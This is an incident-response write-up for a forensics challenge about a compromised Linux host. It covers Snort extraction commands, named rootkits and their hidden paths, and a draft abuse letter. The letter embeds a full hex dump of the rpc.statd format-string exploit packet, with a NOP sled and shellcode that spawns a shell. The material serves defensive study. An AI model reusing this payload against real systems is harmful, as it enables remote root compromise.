SCAN 19
Submitted by: Rohit Nand, CISSP (rohitnand@yahoo.com)

The Analysis:

Download the file via wget and confirm the MD5 checksum.
Once we have downloaded and confirmed the integrity of the file, we can begin analysis. However, we like to first extract data from the binary file, as this will make the data analysis easier. We extract two forms of data. First, we will extract all the packets going to the system 192.168.1.102. This will give us easy access to all the traffic to and from the compromised system. Second, we will extract all the ASCII information from the binary log file, including activity such as telnet, ftp and http sessions. This will make it easier to extract any cleartext activity from the attacker. At times, we will still want to reference the actual binary log file, however this data extraction will make some analysis easier.

Packet extraction
snort -vdr newdat3.log host 192.168.1.102 > snort.txt

ASCII cleartext extraction
mkdir log
snort -dr newdat3.log -c snort.conf -l ./log

1.Which vulnerability did the intruder exploit?
The intruder from 210.114.220.46 first probed on TCP port 111 (portmapper) and then an rpc.statd buffer-overflow attack was launched against the mountd service. We conclude this seeing the connection on the system from the attacker on port 919.

2.What ways, and in what order, did the intruder use to connect and run commands on the system?
The attacker connected to the system via VPN (IPSec/ISAKMP), telnet and ssh in the same order.
- We can infer the VPN connection from the connections on port 500 and viewing the data on Ethereal (which shows ISAKMP connections).
- The rootkit installs SSH on port 24. We can also confirm this from viewing the port 24 connections in Ethereal and doing a "Follow TCP stream" on them.

3.How did the intruder try to hide his edits from the MAC times?
As part of the rootkit install, there is a logcleaner that runs and cleans the system log files like boot.log, cron, messages, spooler, netconf.log, maillog, etc to hide the entries which could be used to trace him.

4.The intruder downloaded rootkits, what were they called? Are they new/custom rootkits?
The intruder downloaded 3 files - Zer0.tar.gz, copy.tar.gz and ooty.tar.gz.
The above are custom rootkits based on t0rn and Adore.

5.Recover (tell how you did it too) the rootkits from the snort binary capture
Run the snort binary through Ethereal. Right click on ftp-data and "Follow TCP Stream". "Save As" in ASCII mode to a file.
Using the above method, all the 3 above mentioned files were recovered. The names and file sizes were verified with information from snort.txt that we got when analyzing the binary with Snort.

6.What does the rootkit do to hide the presence of the attacker on the system?
Adore is a linux LKM based rootkit. It features smart PROMISC flag hiding, persistent file and directory hiding (still hidden after reboot), process-hiding, netstat hiding, and rootshell-backdoor.
In our case, the intruder runs SSH on port 24 and hides the process using Adore.
Files/directories like /usr/X11R6/bin/., /usr/info/.t0rn, /dev/rd/sdc0, /dev/rd/nscd.init, /etc/rc.d/rc3.d/S50inet, /usr/X11R6/lib/X11/.~ are also hidden.

7.What did you learn from this exercise?
Unnecessary services should be removed from the system; OS and application patches should be applied regularly; File integrity checkers can be useful tools for system aministrators; Rootkits can hide processes, files, directories and even connections; chkrootkit and kstat are useful tools for detecting LKM rootkits.

8.How long did this challenge take you?
About 7 hours in total.

Bonus Questions:
Based on this challenge, write an example letter of notification to the source owner that attacked the system. Include any evidence or logs that you feel important.

Hello,
On Sat 15 Sep 2001 at 22:06 (localtime) we detected an attack of a host system on our network (internal IP address-192.168.1.102). This incident appears to have originated from 210.114.220.46. Either some third party has compromised 210.114.220.46 and is now using it to attack others sites or legitimate users of 210.114.220.46 are engaging in practices that are not condoned under most company or ISP acceptable use policies. Sample IDS logs are presented here:
___________________________________________________________________________________________________________________________________________
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/15-22:06:06.819252 210.114.220.46:653 -> 192.168.1.102:111
UDP TTL:47 TOS:0x0 ID:41887 IpLen:20 DgmLen:84
Len: 64
50 54 6F BC 00 00 00 00 00 00 00 02 00 01 86 A0  PTo.............
00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00  ................
00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01  ................
00 00 00 11 00 00 00 00                          ........

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/15-22:06:07.363739 192.168.1.102:111 -> 210.114.220.46:653
UDP TTL:64 TOS:0x0 ID:1480 IpLen:20 DgmLen:56
Len: 36
50 54 6F BC 00 00 00 01 00 00 00 00 00 00 00 00  PTo.............
00 00 00 00 00 00 00 00 00 00 03 97              ............

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/15-22:06:07.719989 210.114.220.46:654 -> 192.168.1.102:919
UDP TTL:47 TOS:0x0 ID:41890 IpLen:20 DgmLen:1104
Len: 1084
1B 6D E4 F6 00 00 00 00 00 00 00 02 00 01 86 B8  .m..............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20  ...............
3B A4 92 6E 00 00 00 09 6C 6F 63 61 6C 68 6F 73  ;..n....localhos
74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  t...............
00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF  ................
18 F7 FF BF 1A F7 FF BF 1A F7 FF BF 25 38 78 25  ............%8x%
38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38  8x%8x%8x%8x%8x%8
78 25 38 78 25 38 78 25 36 32 37 31 36 78 25 68  x%8x%8x%62716x%h
6E 25 35 31 38 35 39 78 25 68 6E 90 90 90 90 90  n%51859x%hn.....
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0  ..............1.
EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3  .|Y.A..A....A...
FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E  .....f.....Y..A.
99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66  ..A...I..A.....f
CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0  .....f....0..A..
66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0  f......1..?.....
3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7  ?.....?..../bin.
46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56  F./shA0..F..v..V
10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F  ..N.............
FF FF FF 00                                      ....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/15-22:06:09.131731 192.168.1.102:919 -> 210.114.220.46:654
UDP TTL:64 TOS:0x0 ID:1482 IpLen:20 DgmLen:60
Len: 40
1B 6D E4 F6 00 00 00 01 00 00 00 00 00 00 00 00  .m..............
00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 07  ................

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/15-22:06:09.472194 210.114.220.46:3002 -> 192.168.1.102:111
TCP TTL:47 TOS:0x0 ID:42608 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x18DB659B  Ack: 0xC60CBD63  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 41187351 23102373

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
___________________________________________________________________________________________________________________________________________

Source: 210.114.220.46
Ports: udp-111, udp-919
Incident type: Buffer Overflow attack
Timezone: mention tz here

Attacking Host Information as found from www.apnic.net and www.nic.co.kr is as follows:
Ctrl-C and Ctrl-V here information from www.nic.co.kr

Please take appropriate action and let us know about it. In case we come across another such incident from your IP address block, we will be forced to report the same to the concerned authorities.